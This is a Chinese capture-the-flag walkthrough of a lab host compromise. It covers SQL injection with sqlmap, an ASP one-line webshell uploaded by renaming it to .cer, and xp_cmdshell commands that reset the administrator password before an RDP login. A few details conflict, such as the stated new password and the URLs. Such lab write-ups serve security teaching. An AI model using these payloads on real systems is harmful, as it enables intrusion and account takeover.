CTF之主机渗透系列三 – 作者:zltjwsys

文章来源:知了堂冯老师原创

v2-eec5e37af1e4a1b398d537a7c1e7acab_hd.j


知了堂禁卫安全实验室(冯万忠.GoDun.F-原创)
0x00 介绍
接着上一篇,咱们继续。还是那句话,任何工具使用均来自互联网,涉及到的技术仅用于教学,不得用于非法用途,请遵守国家安全法律法规,做一个正能量的安全人员。
试题如下:

图片[2]-CTF之主机渗透系列三 – 作者:zltjwsys-安全小百科 

第一步:我们访问链接:http://202.0.0.23/

图片[3]-CTF之主机渗透系列三 – 作者:zltjwsys-安全小百科 

进入网页首页,通过浏览观察,找到http://202.0.0.23/NewsList.asp?SortID=17 新闻资讯页面,通过get方法提交的参数名为SortID,值为1,我们尝试一下是否存在sql注入,通过sqlmap去跑一下。

图片[4]-CTF之主机渗透系列三 – 作者:zltjwsys-安全小百科

 

图片[5]-CTF之主机渗透系列三 – 作者:zltjwsys-安全小百科

发现存在sql注入漏洞
sqlmap.py -u http://202.0.0.23/Notice.asp?ItemID=17 –dbs

图片[6]-CTF之主机渗透系列三 – 作者:zltjwsys-安全小百科 

sqlmap.py -u http://202.0.0.23/Notice.asp?ItemID=17 -D Test_EIMS –tables

图片[7]-CTF之主机渗透系列三 – 作者:zltjwsys-安全小百科 

sqlmap.py -u http://202.0.0.23/Notice.asp?ItemID=17 -D Test_EIMS -T eims_flag –dump

图片[8]-CTF之主机渗透系列三 – 作者:zltjwsys-安全小百科

查看账号密码的数据库表

图片[9]-CTF之主机渗透系列三 – 作者:zltjwsys-安全小百科

对b2076528346216b3进行md5解密,解密得密码为admin1234账号为root
第二步:接下来使用御剑后台扫描,找到后台登录页面
 

图片[10]-CTF之主机渗透系列三 – 作者:zltjwsys-安全小百科 

图片[11]-CTF之主机渗透系列三 – 作者:zltjwsys-安全小百科

右键此页面查看源码,找到一个flag:<!–flag2{890b0c4958ef57e9264a9d2703ea7e8c}–>

图片[12]-CTF之主机渗透系列三 – 作者:zltjwsys-安全小百科 

第三步:使用账户root密码admin1234登录后台,在后台系统信息-文件上传处上传后缀为.asp的asp一句话木马,一句话木马内容:<%eval request(“caidao”)%>  (按照asp一句话木马格式)

图片[13]-CTF之主机渗透系列三 – 作者:zltjwsys-安全小百科

结果提示上传文件格式不对,想下绕过办法 

图片[14]-CTF之主机渗透系列三 – 作者:zltjwsys-安全小百科

这里我们将一句话木马文件改一个可执行的后缀.cer

图片[15]-CTF之主机渗透系列三 – 作者:zltjwsys-安全小百科

则上传成功
第四步:下面我们直接上菜刀工具了

图片[16]-CTF之主机渗透系列三 – 作者:zltjwsys-安全小百科

在网站根目录发现flag文件flag3{23c5b149510105853f5e7ef9a6f06627}

图片[17]-CTF之主机渗透系列三 – 作者:zltjwsys-安全小百科 

在数据库配置文件中找到数据库的账号密码

图片[18]-CTF之主机渗透系列三 – 作者:zltjwsys-安全小百科 

使用一句话木马连接mssql数据库

图片[19]-CTF之主机渗透系列三 – 作者:zltjwsys-安全小百科

利用mssql数据库的xpcmdshell组件执行系统命令 EXEC master..xp_cmdshell ‘whoami’

图片[20]-CTF之主机渗透系列三 – 作者:zltjwsys-安全小百科

当前cmdshell的权限是system权限,所以直接修改administrator的密码为hacker:EXEC master..xp_cmdshell ‘net user administrator 123456’

图片[21]-CTF之主机渗透系列三 – 作者:zltjwsys-安全小百科

第五步:直接远程桌面连接服务器administrator/123456,在桌面发现flag文件,flag5{47baf6d9d60f40c8b1dafa56c62fcd06}

图片[22]-CTF之主机渗透系列三 – 作者:zltjwsys-安全小百科

 

图片[23]-CTF之主机渗透系列三 – 作者:zltjwsys-安全小百科

在c盘发现另外一个flag文件 flag4{e35a01e91e1833d266f95881ae83b4ca}

图片[24]-CTF之主机渗透系列三 – 作者:zltjwsys-安全小百科 

至此,5个flag就找出来了,未完待续!!!

信安干货,请关注专栏:https://zhuanlan.zhihu.com/c_1142392164838404096

来源:freebuf.com 2019-11-26 10:17:16 by: zltjwsys

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论